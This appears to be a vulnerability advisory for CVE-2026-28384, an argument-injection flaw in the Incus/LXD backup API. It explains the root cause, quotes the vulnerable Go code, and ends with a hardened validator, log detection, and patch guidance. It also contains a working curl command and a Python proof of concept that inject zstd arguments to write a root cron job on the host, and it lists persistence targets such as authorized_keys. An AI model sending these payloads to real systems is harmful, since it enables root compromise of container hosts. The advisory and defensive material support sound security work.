How CVE-2026-28384 Works
CVE-2026-28384 is a critical vulnerability in Incus and Canonical LXD arising from improper sanitization of the `compression_algorithm` parameter. The flaw exists in the backup and image creation endpoints, where user input is used to construct a command line for a compression utility.
The root cause is a validation logic error. The Incus/LXD daemon parses the user-provided `compression_algorithm` string and checks only the first token (the compression binary name) against an allowlist. The code does not validate or reject any additional arguments that may follow the first token.
When a backup or image export is requested, the `compressFile()` function is invoked. It builds the argument list as `-c` followed by every user-supplied field after the binary name and passes the whole list to `exec.Command()`. This means an attacker can inject arbitrary command-line arguments that are passed directly to the compression binary.
The core vulnerable code flow is:

1. The user submits a `compression_algorithm` value.
2. The daemon splits the value into fields using `shellquote.Split()`.
3. It checks `fields[0]` against an allowlist of compressors like `zstd`, `gzip`, `xz`, etc.
4. It then calls `exec.LookPath(fields[0])` to verify the binary exists.
5. Crucially, `fields[1:]` are not sanitized and are appended to the argument list.
6. The final command is executed as `fields[0] -c fields[1:]`. By supplying a value such as `zstd -d -f --pass-through -o /etc/cron.d/incus-pwn -- /var/lib/incus/.../payload`, an attacker can cause the daemon to execute `zstd -c -d -f --pass-through -o /etc/cron.d/incus-pwn -- /var/lib/incus/.../payload`. This writes a file to an arbitrary location on the host, leading to arbitrary command execution.

The vulnerability affects Incus and LXD versions from 4.12 through 6.6 and was patched in Incus 6.7 and LXD snap versions 5.0.6, 5.21.4, and 6.7.

DailyCVE Form:

Platform: Incus / LXD
Version: 4.12 through 6.6
Vulnerability: Argument Injection
Severity: Critical
Date: 2026-03-12

Prediction: Patch available (2026-03)

What Undercode Say:

Analytics

The vulnerability is triggered by sending a crafted `compression_algorithm` value in an API request to the `/1.0/instances/{name}/backups` or image creation endpoints. The following is a breakdown of the attack.

Vulnerable Code Snippet (Go):

```go
fields, err := shellquote.Split(value)
...
// Only the first token (the binary name) is checked against the allowlist.
if !slices.Contains([]string{"bzip2", "gzip", "lz4", "lzma", "pigz", "pzstd", "pxz", "tar2sqfs", "xz", "zstd"}, fields[0]) {
	return fmt.Errorf("Compression algorithm %q isn't currently supported", fields[0])
}
_, err = exec.LookPath(fields[0]) // Extra arguments are not rejected.
...
args := []string{"-c"}
if len(fields) > 1 {
	args = append(args, fields[1:]...) // user-controlled tokens become compressor arguments
}
cmd := exec.Command(fields[0], args...)
```

Bash Command to Exploit (Conceptual):
This demonstrates the argument injection that leads to arbitrary file write. The payload writes a cron job to the host.

```bash
curl -k -X POST "https://<target>:8443/1.0/instances/<instance>/backups?project=default" \
  -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/json" \
  -d '{
    "compression_algorithm": "zstd -d -f --pass-through -o /etc/cron.d/incus-pwn -- /var/lib/incus/containers/<project>_<instance>/rootfs/var/tmp/payload",
    "instance_only": true
  }'
```

Python PoC Snippet:
```python
import requests
import json

url = "https://<target>:8443/1.0/instances/<instance>/backups"
headers = {
    "Authorization": "Bearer <token>",
    "Content-Type": "application/json"
}
payload = {
    "compression_algorithm": "zstd -d -f --pass-through -o /etc/cron.d/incus-pwn -- /var/lib/incus/containers/default_instance/rootfs/var/tmp/payload",
    "instance_only": True
}
response = requests.post(url, headers=headers, data=json.dumps(payload), verify=False)
print(response.status_code)
```

Detection:
Monitor Incus/LXD API logs for suspicious `compression_algorithm` values containing shell metacharacters or extra arguments like `-o`, `--pass-through`, or `-d`.

Exploit:
An authenticated attacker can exploit this by:

- Uploading a Payload: Creating a file within a writable directory of a container instance (e.g., `/var/tmp/payload`).
- Crafting the Request: Submitting a backup request with a `compression_algorithm` value that includes arguments to write the payload to a sensitive host location. Common targets include:
  - `/etc/cron.d/` – for scheduled command execution.
  - `/root/.ssh/authorized_keys` – for persistent SSH access.
  - `/etc/profile.d/` – for execution during user login.
- Triggering the Backup: The API call causes the daemon to execute the injected command, writing the file to the host.

The provided PoC automates this by uploading a cron payload and then requesting a backup with the malicious `compression_algorithm`.
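Added example (not Incus/LXD code): a whole-string allowlist check that accepts nothing beyond a single compressor name, followed by a scan of constructed API log lines for the extra-argument pattern named in the Detection section above. `strings.Fields` stands in for `shellquote.Split`, and the `body=` log layout and the sample lines are constructed for illustration.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Allowlist copied from the vulnerable snippet quoted on the page.
var allowedCompressors = []string{"bzip2", "gzip", "lz4", "lzma", "pigz", "pzstd", "pxz", "tar2sqfs", "xz", "zstd"}
// validateCompressionAlgorithm is the hardened check: the whole value must be exactly one allowlisted binary
// name, so trailing tokens such as "-o /etc/cron.d/..." are rejected. strings.Fields stands in for shellquote.Split.
func validateCompressionAlgorithm(value string) (string, error) {
	fields := strings.Fields(value)
	if len(fields) != 1 {
		return "", fmt.Errorf("compression algorithm %q must be a single binary name, got %d tokens", value, len(fields))
	}
	for _, name := range allowedCompressors {
		if fields[0] == name {
			return name, nil
		}
	}
	return "", fmt.Errorf("compression algorithm %q isn't currently supported", fields[0])
}

// scanLogLine pulls the JSON body out of a constructed "body=" log line (not Incus/LXD's real log
// layout) and flags compression_algorithm values that carry extra arguments or shell metacharacters.
func scanLogLine(line string) (value string, flagged bool) {
	_, body, _ := strings.Cut(line, "body=")
	var req map[string]any
	if err := json.Unmarshal([]byte(body), &req); err != nil {
		return "", false
	}
	value, _ = req["compression_algorithm"].(string)
	flagged = len(strings.Fields(value)) > 1 || strings.ContainsAny(value, ";|&$`")
	return value, flagged
}
// Constructed sample log lines; the second carries the injection payload shown on the page.
var sampleLog = []string{
	`2026-03-12T09:14:02Z POST /1.0/instances/web01/backups body={"compression_algorithm":"zstd","instance_only":true}`,
	`2026-03-12T09:15:40Z POST /1.0/instances/web01/backups body={"compression_algorithm":"zstd -d -f --pass-through -o /etc/cron.d/incus-pwn -- /var/tmp/payload","instance_only":true}`,
	`2026-03-12T09:16:11Z POST /1.0/images body={"compression_algorithm":"gzip"}`,
}
func main() {
	for _, line := range sampleLog {
		v, bad := scanLogLine(line)
		_, err := validateCompressionAlgorithm(v) // hardened check applied to the same value
		fmt.Printf("flagged=%t value=%q hardened check: %v\n", bad, v, err)
	}
}
```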
Protection:
Patch Immediately: Upgrade to Incus version 6.7 or later, or LXD snap versions 5.0.6, 5.21.4, or 6.7 or later.
API Access Restriction: Restrict access to the Incus/LXD API to only trusted users and networks.
Input Validation: Implement strict allowlisting for the entire `compression_algorithm` string, not just the first token.
Command Construction: Avoid constructing shell commands from user input. Use parameterized APIs or libraries that separate arguments from the command.

Impact:
Arbitrary File Write: An attacker can write files to any location on the host filesystem that the Incus/LXD daemon (typically running as root) has access to.
Privilege Escalation: By writing to system directories like `/etc/cron.d`, an attacker can achieve arbitrary command execution with root privileges.
Full System Compromise: This can lead to a complete compromise of the host system, allowing the attacker to install backdoors, exfiltrate data, or pivot to other systems on the network.